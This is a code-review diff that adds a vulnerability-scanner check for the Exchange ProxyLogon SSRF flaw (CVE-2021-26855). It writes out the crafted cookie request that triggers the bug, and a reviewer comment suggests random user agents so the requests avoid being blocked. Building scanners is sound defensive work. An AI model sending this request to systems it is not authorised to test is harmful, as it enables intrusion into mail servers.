lib/vuln/msexchange_cve_2021_26855/engine.py

```diff
@@ -0,0 +1,181 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+import socket
+import socks
+import time
+import json
+import threading
+import string
+import random
+import sys
+import os
+from core.alert import *
+from core.targets import target_type
+from core.targets import target_to_host
+from core.load_modules import load_file_path
+from lib.socks_resolver.engine import getaddrinfo
+from core._time import now
+from core.log import __log_into_file
+import requests
+
+
+def extra_requirements_dict():
+    return {
+        "vuln_ports": [80, 443]
+    }
+
+
+def conn(targ, port, timeout_sec, socks_proxy):
+    try:
+        if socks_proxy is not None:
+            socks_version = socks.SOCKS5 if socks_proxy.startswith(
+                'socks5://') else socks.SOCKS4
+            socks_proxy = socks_proxy.rsplit('://')[1]
+            if '@' in socks_proxy:
+                socks_username = socks_proxy.rsplit(':')[0]
+                socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0]
+                socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]),
+                                        int(socks_proxy.rsplit(':')[-1]), username=socks_username,
+                                        password=socks_password)
+                socket.socket = socks.socksocket
+                socket.getaddrinfo = getaddrinfo
+            else:
+                socks.set_default_proxy(socks_version, str(socks_proxy.rsplit(':')[0]),
+                                        int(socks_proxy.rsplit(':')[1]))
+                socket.socket = socks.socksocket
+                socket.getaddrinfo = getaddrinfo()
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        sys.stdout.flush()
+        s.settimeout(timeout_sec)
+        s.connect((targ, port))
+        return s
+    except Exception as e:
+        return None
+
+
+def msexchange_vuln(target, port, timeout_sec, log_in_file, language, time_sleep,
+                   thread_tmp_filename, socks_proxy, scan_id, scan_cmd):
+    try:
+        s = conn(target, port, timeout_sec, socks_proxy)
+        if not s:
+            return False
+        else:
+            if target_type(target) != "HTTP" and port == 443:
+                target = 'https://' + target
+            if target_type(target) != "HTTP" and port == 80:
+                target = 'http://' + target
+            cookies = {
+                "X-AnonResource": "true",
+                "X-AnonResource-Backend": "localhost/ecp/default.flt?~3",
+                "X-BEResource": "localhost/owa/auth/logon.aspx?~3",
+            }
+            if target.endswith("/"):
+                target = target[:-1]
+            path = '/owa/auth/x.js'
+            req = requests.get(target + path, cookies=cookies)
```

Comment:
@ktg-123  you must add verify=False here and timeout=timeout_sec
as we are connecting on https://ip/owa instead of https://fqdn verification will fail and the request fails silently as you simply kill the exception
Also you should add headers=useragent and get a random useragent from the useragent libraries (check @aman566 's merged PRs) otherwise the request will go out with python/requests as useragent and can be blocked